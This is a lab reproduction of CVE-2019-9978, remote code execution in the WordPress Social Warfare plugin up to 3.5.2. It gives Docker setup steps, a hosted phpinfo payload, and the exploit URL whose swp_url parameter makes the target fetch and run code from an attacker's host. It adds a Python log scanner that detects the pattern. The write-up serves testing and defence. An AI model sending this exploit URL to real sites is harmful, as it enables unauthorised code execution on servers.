CVE-2019-9978: WordPress Social Warfare plugin RCE

0x00 Affected versions

social-warfare <= 3.5.2

0x01 Setting up WordPress

$ docker pull medicean/vulapps:w_wordpress_6
$ docker run -d -p 80:80 medicean/vulapps:w_wordpress_6

Open the site in a browser (screenshot omitted).

0x02 Downloading the Social Warfare plugin

root@40db189257de:~# wget -O social-warfare-3.5.2.tar.gz https://github.com/warfare-plugins/social-warfare/archive/3.5.2.tar.gz
root@40db189257de:~# tar xvf social-warfare-3.5.2.tar.gz
root@40db189257de:~# mv social-warfare-3.5.2 /var/www/html/wp-content/

(The -O flag is needed because GitHub serves the archive as 3.5.2.tar.gz; without it the tar command below would not find social-warfare-3.5.2.tar.gz.)

Open the admin dashboard in a browser:

http://yourvpsip/wp-admin/

After logging into the dashboard, install the plugin: select Social Warfare and click Activate (screenshot omitted).

A new plugin settings entry appears in the left sidebar (screenshot omitted).

0x03 Reproducing the vulnerability

Place the payload in the web root of the attacking machine.

(Tip: on CentOS 6, after starting httpd, stop the iptables service so the file is reachable.)

[root@vultr html]# echo "<pre>phpinfo()</pre>" > test.txt

Opening the following URL in a browser should show the file (screenshot omitted):

http://yourattackip/test.txt

Construct the URL and visit it (screenshot omitted):

http://your-targetIP/wp-admin/admin.php?page=social-warfare&swp_debug=load_options&swp_url=http://you-attack-ip/test.txt

Reproduction successful.
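The request above leaves a distinctive trace in the web server access log, so here is an added detection example (not part of the original post) in Python that scans Apache combined-format log lines for the CVE-2019-9978 pattern: admin.php?page=social-warfare with swp_debug=load_options and a swp_url parameter pointing at a remote host. The log lines, IP addresses and filenames are constructed samples, not real traffic. Detection is only a stopgap; the fix is to upgrade the plugin to 3.5.3 or later.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format), not real traffic.
# Line 1 and 4 match the exploit pattern; line 2 is ordinary use of the plugin
# settings page; line 3 is unrelated traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [16/May/2019:08:41:03 +0000] "GET /wp-admin/admin.php?page=social-warfare&swp_debug=load_options&swp_url=http://198.51.100.9/test.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [16/May/2019:08:41:10 +0000] "GET /wp-admin/admin.php?page=social-warfare HTTP/1.1" 200 7034 "-" "Mozilla/5.0"
192.0.2.14 - - [16/May/2019:08:42:00 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "curl/7.64"
198.51.100.3 - - [16/May/2019:08:43:21 +0000] "GET /wp-admin/admin.php?page=social-warfare&swp_debug=load_options&swp_url=https%3A%2F%2F198.51.100.9%2Fx.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp,
# method, request target and status code are all we need here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_request(target):
    """Return a reason string if the request target matches the
    CVE-2019-9978 pattern, otherwise None."""
    parts = urlsplit(target)
    if not parts.path.endswith('/wp-admin/admin.php'):
        return None
    q = parse_qs(parts.query)
    if q.get('page') != ['social-warfare']:
        return None
    if q.get('swp_debug') != ['load_options']:
        return None
    urls = q.get('swp_url')
    if not urls:
        # The debug handler was reached without a URL: still worth a look.
        return 'swp_debug=load_options without swp_url (debug endpoint probed)'
    host = urlsplit(urls[0]).hostname  # parse_qs already percent-decoded it
    if host:
        return f'load_options with remote swp_url host {host}'
    return 'load_options with swp_url'


def scan_log(text):
    """Scan log text and return one finding dict per suspicious request."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reason = classify_request(rec['target'])
        if reason:
            findings.append({'ip': rec['ip'], 'ts': rec['ts'],
                             'status': rec['status'], 'reason': reason})
    return findings


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Running the block on the constructed sample reports the first and fourth lines and names the remote host that swp_url pointed at, which is the indicator to pivot on: any content fetched from that host by the vulnerable plugin should be treated as attacker-controlled, and the site should be checked for a plugin version at or below 3.5.2.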

References

Detailed reproduction of the WordPress Social Warfare plugin remote code execution vulnerability (WordPress Social Warfare组件 远程代码漏洞执行详细复现)